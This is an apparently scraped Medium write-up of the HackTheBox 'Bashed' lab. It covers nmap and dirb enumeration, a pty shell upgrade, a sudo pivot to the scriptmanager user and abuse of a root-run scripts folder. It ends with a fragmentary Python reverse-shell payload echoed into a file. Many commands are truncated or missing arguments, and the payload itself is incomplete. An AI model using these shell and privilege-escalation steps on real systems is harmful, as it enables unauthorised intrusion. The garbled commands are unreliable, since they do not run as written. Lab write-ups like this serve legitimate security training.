Bashed Write-Up

1- Network enumeration:

nmap —sV -sC -p 80-sV to determine service/version info
-sC to use the default Nmap scripts
  • the http port is opend:

2-directory brut force:

nmap — script=http-enum -p 80
$ dirb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
$ python3 -m http.server 12344
$ wget
$ python -c "import pty; pty.spawn('/bin/bash');"
www-data@bashed:/$ ls -la
www-data@bashed:/$ sudo -u scriptmanager bash
scriptmanager@bashed:/$ cd scripts
scriptmanager@bashed:/scripts$ ls -la
total 16
drwxrwxr — 2 scriptmanager scriptmanager 4096 Dec 4 2017 .
drwxr-xr-x 23 root root 4096 Dec 4 2017 ..
-rw-r — r — 1 scriptmanager scriptmanager 217 Mar 15 10:49
-rw-r — r — 1 root root 12 Mar 15 10:38 test.txt
scriptmanager@bashed:/scripts$ cat
f = open("test.txt", "w")
f.write("testing 123!")
scriptmanager@bashed:/scripts$scriptmanager@bashed:/scripts$ cat test.txt
testing 123!scriptmanager@bashed:/scripts$


echo 'import socket,subprocess,os
os.dup2(s.fileno(),2);["/bin/sh","-i"]); ' >




Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

What coding language is best for 8–10-year-old kids? Would Python be too complex at that age?

Micro frontends: Composition

Goodbye Electron, Hello Flutter

Why your startup has to do DevOps from day one

Handling Complexity: Using Sagas to Provide Transactional Support for Distributed Systems

Manage macOS Cross-Site Tracking with MDM

Making Circle in CSS Step by Step

[Algorithm] Linked List to Integer (Tree/C++)

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Mohamed isselmou

Mohamed isselmou


More from Medium

How do Red Team Exercises help CISO to Validate the Security Controls Effectively?


Paper — HacktheBox Walkthrough

MAL: Malware Introductory — TryHackMe CTF